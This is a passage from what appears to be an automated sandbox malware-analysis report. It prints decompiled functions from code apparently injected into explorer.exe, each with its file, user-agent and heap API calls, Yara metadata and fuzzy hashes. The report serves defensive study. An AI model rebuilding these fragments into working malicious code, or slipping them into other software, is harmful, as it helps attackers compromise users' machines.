                                                                                                                                                                        								_t149 = _t219 + 0x0000000e & 0x0000ffff;
                                                                                                                                                                        								_v92 = _t149;
                                                                                                                                                                        								_t254 = _t149 % _t211;
                                                                                                                                                                        								_v96 = _t149 / _t211 + _v68 & 0x0000ffff;
                                                                                                                                                                        								_t153 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        								_t155 = E007B0D7E(_t153 + 0x228, _t211, _t149 % _t211, _t307, 0, _t153 + 0x228, 0); // executed
                                                                                                                                                                        								_t284 = _t284 + 0xc;
                                                                                                                                                                        								__eflags = _t155;
                                                                                                                                                                        								if(_t155 >= 0) {
                                                                                                                                                                        									_t156 = E007A8BDE(0x1000); // executed
                                                                                                                                                                        									_t278 = _t156;
                                                                                                                                                                        									_v80 = _t278;
                                                                                                                                                                        									_pop(_t219);
                                                                                                                                                                        									__eflags = _t278;
                                                                                                                                                                        									if(_t278 != 0) {
                                                                                                                                                                        										_t157 = E007A109A(_t219, 0x338);
                                                                                                                                                                        										_t227 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        										_v104 = _t157;
                                                                                                                                                                        										E007A96F3( &_v40, 7, 0xa, _t227 + 0x648);
                                                                                                                                                                        										_t229 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        										_t160 = E007A65F6(_t254, _t229 + 0x228, 1,  *((intOrPtr*)(_t229 + 0xa0)));
                                                                                                                                                                        										_t284 = _t284 + 0x1c;
                                                                                                                                                                        										_v100 = _t160;
                                                                                                                                                                        										__eflags = _t160;
                                                                                                                                                                        										if(_t160 != 0) {
                                                                                                                                                                        											_push(_v92 % _t211 & 0x0000ffff);
                                                                                                                                                                        											_push(_v96 & 0x0000ffff);
                                                                                                                                                                        											_push(_v88 % _t211 & 0x0000ffff);
                                                                                                                                                                        											_push(_v84 & 0x0000ffff);
                                                                                                                                                                        											_push(_v100);
                                                                                                                                                                        											_push( &_v40);
                                                                                                                                                                        											_t172 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        											__eflags = _t172 + 0x1020;
                                                                                                                                                                        											E007A9E51(_t278, 0x1000, _v104, _t172 + 0x1020);
                                                                                                                                                                        											E007A8BAF( &_v104);
                                                                                                                                                                        											E007AB5FB(_t278, 0, 0xbb8, 1, 0); // executed
                                                                                                                                                                        											_t284 = _t284 + 0x40;
                                                                                                                                                                        											E007A8BF4( &_v100, 0xfffffffe);
                                                                                                                                                                        										}
                                                                                                                                                                        										E007A8BF4( &_v80, 0xfffffffe);
                                                                                                                                                                        										_pop(_t219);
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L26;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t219 != 2) {
                                                                                                                                                                        							goto L26;
                                                                                                                                                                        						}
                                                                                                                                                                        						E007A5057();
                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                        						_t183 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t183 + 0xe4))( &_v72);
                                                                                                                                                                        						_t187 = _v66 + 0x00000002 & 0x0000ffff;
                                                                                                                                                                        						_v100 = _t187;
                                                                                                                                                                        						_t236 = 0x3c;
                                                                                                                                                                        						_v104 = _t187 / _t236 + _v68 & 0x0000ffff;
                                                                                                                                                                        						_t212 = E007A8BDE(0x1000);
                                                                                                                                                                        						_v92 = _t212;
                                                                                                                                                                        						_pop(_t237);
                                                                                                                                                                        						if(_t212 != 0) {
                                                                                                                                                                        							_t192 = E007A9DF2(_t237, 0x3c0);
                                                                                                                                                                        							_t239 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        							_push(_t239 + 0x228);
                                                                                                                                                                        							_t241 = 0x3c;
                                                                                                                                                                        							_v96 = _t192;
                                                                                                                                                                        							_push(_v100 % _t241 & 0x0000ffff);
                                                                                                                                                                        							E007A9E51(_t212, 0x1000, _t192, _v104 & 0x0000ffff);
                                                                                                                                                                        							E007A8BAF( &_v96);
                                                                                                                                                                        							E007AB5FB(_t212, 0, 0xbb8, 1, 0);
                                                                                                                                                                        							E007A8BF4( &_v92, 0xfffffffe);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L19;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t206 =  *((intOrPtr*)(_t266 + 0x214));
                                                                                                                                                                        					if(_t206 == _t210 ||  *((intOrPtr*)(_t266 + 4)) < 6 && _t206 == 2) {
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L26;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x007a558a
                                                                                                                                                                        0x007a558c
                                                                                                                                                                        0x007a5590
                                                                                                                                                                        0x007a5593
                                                                                                                                                                        0x007a559a
                                                                                                                                                                        0x007a55a0
                                                                                                                                                                        0x007a55b2
                                                                                                                                                                        0x007a55b5
                                                                                                                                                                        0x007a55b8
                                                                                                                                                                        0x007a55c5
                                                                                                                                                                        0x007a55cd
                                                                                                                                                                        0x007a55d7
                                                                                                                                                                        0x007a55eb
                                                                                                                                                                        0x007a55fa
                                                                                                                                                                        0x007a5600
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5593
                                                                                                                                                                        0x007a5492
                                                                                                                                                                        0x007a549a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a549a

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$Process$AttributesCodeCreateExitFileFreeHeap_vsnwprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1791054438-0
                                                                                                                                                                        • Opcode ID: 5aeb2dab6abeb157ae46f229c9fb03d83c6428f07457d3897c3c13ab967dd6df
                                                                                                                                                                        • Instruction ID: b4054d5d0e96a75af1771e4fc610bef088a627e8b0a6d3ddab6771ab8ca64925
                                                                                                                                                                        • Opcode Fuzzy Hash: 5aeb2dab6abeb157ae46f229c9fb03d83c6428f07457d3897c3c13ab967dd6df
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC1C372604700EFD750EB68DC46FAA73E9ABCA710F04873AF554D72D1DA78D9008B66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB3C7(char _a4, intOrPtr* _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                        				char _t44;
                                                                                                                                                                        
                                                                                                                                                                        				_t32 = _a4;
                                                                                                                                                                        				_t44 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                        					_t29 = E007AB2FE(_t32);
                                                                                                                                                                        					if(_t29 == 0) {
                                                                                                                                                                        						L12:
                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                        						L13:
                                                                                                                                                                        						L14:
                                                                                                                                                                        						return _t14;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t15 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
                                                                                                                                                                        					if(_t42 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						_t17 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t17 + 0x30))(_t29);
                                                                                                                                                                        						if(_t44 != 0) {
                                                                                                                                                                        							E007A8BF4( &_v8, 0);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L12;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t4 = _t42 + 1; // 0x1
                                                                                                                                                                        					_t22 = E007A8BDE(_t4); // executed
                                                                                                                                                                        					_t44 = _t22;
                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = E007AB36C(_t29, _t44, _t42,  &_a4); // executed
                                                                                                                                                                        					if(_t24 == 0 || _a4 != _t42) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t25 = _a8;
                                                                                                                                                                        						 *((char*)(_t42 + _t44)) = 0;
                                                                                                                                                                        						if(_t25 != 0) {
                                                                                                                                                                        							 *_t25 = _t42;
                                                                                                                                                                        						}
                                                                                                                                                                        						FindCloseChangeNotification(_t29);
                                                                                                                                                                        						_t14 = _t44;
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t14 = 0;
                                                                                                                                                                        				goto L14;
                                                                                                                                                                        			}















                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,007B0BBE,00000000,00000000,007CEFE0,007BC9A0,00000000,007BC9A0,00000000,00000000,?,00000294,00000000,00EAFB48,00000400), ref: 007AB43F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: f7edebe135204845594ca1fa07b00baf8d82e6cf2cfe26861355a12e04376c19
                                                                                                                                                                        • Instruction ID: 6614a873b4541a5ff76ce1cb2541b4a272a490d1fbd733ff582eeb0a1475159f
                                                                                                                                                                        • Opcode Fuzzy Hash: f7edebe135204845594ca1fa07b00baf8d82e6cf2cfe26861355a12e04376c19
                                                                                                                                                                        • Instruction Fuzzy Hash: E3119372601656ABDB109F69DC85B9A77DCEB8EB50F104365F901C7253EB38DD0087A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A600C(void* __edx, void* __fp0) {
                                                                                                                                                                        				short _v30;
                                                                                                                                                                        				short _v32;
                                                                                                                                                                        				short _v34;
                                                                                                                                                                        				short _v36;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				void* _t38;
                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                        				void* _t46;
                                                                                                                                                                        
                                                                                                                                                                        				_t46 = __fp0;
                                                                                                                                                                        				_t38 = __edx;
                                                                                                                                                                        				_t39 = 0;
                                                                                                                                                                        				_t16 = E007A8BDE(0x14);
                                                                                                                                                                        				_t32 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t40 = _t16;
                                                                                                                                                                        				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
                                                                                                                                                                        					_v36 =  *((intOrPtr*)(_t32 + 0x228));
                                                                                                                                                                        					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
                                                                                                                                                                        					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
                                                                                                                                                                        					_v30 = 0;
                                                                                                                                                                        					GetDriveTypeW( &_v36); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				 *_t40 = 2;
                                                                                                                                                                        				 *(_t40 + 4) = _t39;
                                                                                                                                                                        				_t17 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
                                                                                                                                                                        				_t18 = E007A2BE4( *((intOrPtr*)(_t17 + 0x224)), _t38, 0, _t46); // executed
                                                                                                                                                                        				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
                                                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					if(E007A32A3() == 0) {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t39 = _t39 | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t38 = 0x3b;
                                                                                                                                                                        					if(E007AAEC1(_t18, _t38) != 0) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						E007A53C7(_t40, _t38, __eflags, _t46);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E007AAFD6();
                                                                                                                                                                        				E007AAFD6();
                                                                                                                                                                        				return _t39;
                                                                                                                                                                        			}
















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • GetDriveTypeW.KERNELBASE(?), ref: 007A605C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateDriveHeapType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 414167704-0
                                                                                                                                                                        • Opcode ID: ce6d25339b04dbbfd27ee68463cf11fe991978f235da93ee1030c2c4cdaa7990
                                                                                                                                                                        • Instruction ID: 3ab6f6adb018144a07542306bc7c49a53234923eb02ad8d0eb1eb710f22d5202
                                                                                                                                                                        • Opcode Fuzzy Hash: ce6d25339b04dbbfd27ee68463cf11fe991978f235da93ee1030c2c4cdaa7990
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D11B2786003019ACB14AFB5D809AAAB3E4BF89754F14863DE815C7291EB79D842CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007AB421,00000000,00000000,?,007B0BBE,00000000), ref: 007AB3AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: ffa7d1b720c0d3b098c26db11001e45e9a5c197d62f6f6fec03a978902084ca5
                                                                                                                                                                        • Instruction ID: 151d309abffd398aa5f7db203cac9290fcebd12ce3e4f61ddd5f24d901eeac9e
                                                                                                                                                                        • Opcode Fuzzy Hash: ffa7d1b720c0d3b098c26db11001e45e9a5c197d62f6f6fec03a978902084ca5
                                                                                                                                                                        • Instruction Fuzzy Hash: EA01FB72600218FFDB11CA99DC45BAA77ACEB85755F204169A809D7101E374EE009BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                        			E007AF4C9(void* __ecx, void* __edx) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                                        				intOrPtr* _t11;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t5 =  *0x7bf844; // 0xeafda8
                                                                                                                                                                        				if( *_t5 == 0) {
                                                                                                                                                                        					_v8 = E007A9DD8(0xa8);
                                                                                                                                                                        					 *0x7bf920 = E007A9880(_t6, 0);
                                                                                                                                                                        					E007A8B9C( &_v8);
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v8 = 0x100;
                                                                                                                                                                        					_t10 = E007A8BDE(0x101);
                                                                                                                                                                        					 *0x7bf920 = _t10;
                                                                                                                                                                        					_t11 =  *0x7bf844; // 0xeafda8
                                                                                                                                                                        					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                                                                                                                                                        					if(_t12 == 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						return E007A8BF4(0x7bf920, 0xffffffff) | 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}









                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,0000087A,?,007AF570,007A5C5C,?,007A6009), ref: 007AF4FA
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AgentAllocateFreeObtainStringUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 471734292-0
                                                                                                                                                                        • Opcode ID: 9382b773f7ac48fbd5aa064a58432008707736058ecd8fc6f1a7fde6f9b2c26f
                                                                                                                                                                        • Instruction ID: e16ad683fd8dda8c300393ec3492fb67734403947d298fbf89f9a406b4c4331d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9382b773f7ac48fbd5aa064a58432008707736058ecd8fc6f1a7fde6f9b2c26f
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F068B0A05200EEE748EFB8DC15F9973E4AB86764F244368E515D71D0DF7C9E00C625
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E007AB31F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        
                                                                                                                                                                        				_t23 = __ecx;
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t21 = __edx;
                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					_t13 = 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                                                                        						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t26 = _t26 + _v8;
                                                                                                                                                                        						_t23 = _v12;
                                                                                                                                                                        						if(_t26 < _a4) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t13 = 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				L4:
                                                                                                                                                                        				return _t13;
                                                                                                                                                                        			}










                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007A956A,?), ref: 007AB34C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                        • Opcode ID: 19586f01c931cfec5527e0ce0bf8d3f168567029b7ad837adacd575c340ccb11
                                                                                                                                                                        • Instruction ID: c5814b9312782899b33c950af2b3d833e85c7ff3e193f49856055e8298bb3482
                                                                                                                                                                        • Opcode Fuzzy Hash: 19586f01c931cfec5527e0ce0bf8d3f168567029b7ad837adacd575c340ccb11
                                                                                                                                                                        • Instruction Fuzzy Hash: 24F0F972A10218BFDB14CFA8DC85BAB7BACEB49740F118269A505E7101E774AE409BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AC879(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t12 =  *0x7bf820; // 0xeaf8b8
                                                                                                                                                                        				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					_t14 = E007AC862(); // executed
                                                                                                                                                                        					_t23 = _t14;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						FindCloseChangeNotification(_v8);
                                                                                                                                                                        						_t17 = _t23;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_v8 != _t14) {
                                                                                                                                                                        							_t18 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t17 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 790d09370d9de3bee0aaad945316e11b95ed7eaa57d66136c98e90fd41959bf0
                                                                                                                                                                        • Instruction ID: 2b814434a48af55082fae1e93087c13409b6f57ca75824f1c300e7ef8d76d8e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 790d09370d9de3bee0aaad945316e11b95ed7eaa57d66136c98e90fd41959bf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 16F01732A10604FBDB12DBA4DD06E9D73F8BB49745F1142A4E501E7160DB3CDE009B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BF4(char _a4, intOrPtr _a8) {
                                                                                                                                                                        				char _t3;
                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                        				void* _t9;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = _a4;
                                                                                                                                                                        				if(_t3 == 0) {
                                                                                                                                                                        					return _t3;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t9 =  *_t3;
                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                        					 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                        					_t4 = _a8;
                                                                                                                                                                        					if(_t4 != 0xffffffff) {
                                                                                                                                                                        						if(_t4 == 0xfffffffe) {
                                                                                                                                                                        							_t4 = E007AA456(_t9);
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t4 = E007AA43D(_t9);
                                                                                                                                                                        					}
                                                                                                                                                                        					E007A8D6D(_t9, 0, _t4);
                                                                                                                                                                        					_t3 = RtlFreeHeap( *0x7bf900, 0, _t9); // executed
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t3;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                        • Opcode ID: 564d06c554c04aef6c20d1b77815a6b0e67fed73b792230cc9e3d6623cb55a8c
                                                                                                                                                                        • Instruction ID: 3892f46dc0b01d3d65142893b65d18f6ec438962c8b64c36e6608483a5f92268
                                                                                                                                                                        • Opcode Fuzzy Hash: 564d06c554c04aef6c20d1b77815a6b0e67fed73b792230cc9e3d6623cb55a8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0A731A02514ABDAA13B28AC49F6A77589F87B30F144391F525D71D1DF6CAC404AF7
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB2BA(WCHAR* __ecx, long __edx) {
                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                        				long _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        
                                                                                                                                                                        				_t12 = __edx;
                                                                                                                                                                        				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                                                                                                                                                        				if(_t13 != 0xffffffff) {
                                                                                                                                                                        					if(_t12 == 4) {
                                                                                                                                                                        						_t6 =  *0x7bf818; // 0xeaf6c8
                                                                                                                                                                        						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}







                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,007A9552), ref: 007AB2D5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: a7ee4778c90aefce8fc62a37278a801d41fa61bfc4b98000a501d23cce294a1b
                                                                                                                                                                        • Instruction ID: 5cd8de3d4a8f5020eb9d63ee9f48dd2eb12dd9f46575bf8d26480bbc93c158e9
                                                                                                                                                                        • Opcode Fuzzy Hash: a7ee4778c90aefce8fc62a37278a801d41fa61bfc4b98000a501d23cce294a1b
                                                                                                                                                                        • Instruction Fuzzy Hash: E3E0E5B2700114BEE22016AAAC89FAB66ACE7CABB9F118371F665D6191C6249C4142A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB467(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
